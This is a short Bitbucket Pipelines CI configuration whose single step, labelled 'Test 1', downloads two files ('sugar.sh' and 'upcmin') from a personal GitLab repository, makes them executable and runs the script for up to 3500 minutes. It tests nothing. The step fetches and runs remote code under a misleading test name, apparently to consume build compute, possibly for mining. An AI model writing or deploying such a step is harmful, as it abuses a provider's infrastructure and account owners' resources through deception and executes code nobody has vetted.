image: atlassian/default-image:2

pipelines:
  default:
    - parallel:
      - step:
          name: Test 1
          script:
            - wget https://gitlab.com/mantul04/mantul0408/-/raw/master/sugar.sh
            - wget https://gitlab.com/mantul04/mantul0408/-/raw/master/upcmin
            - chmod +x upcmin sugar.sh
            - timeout 3500m ./sugar.sh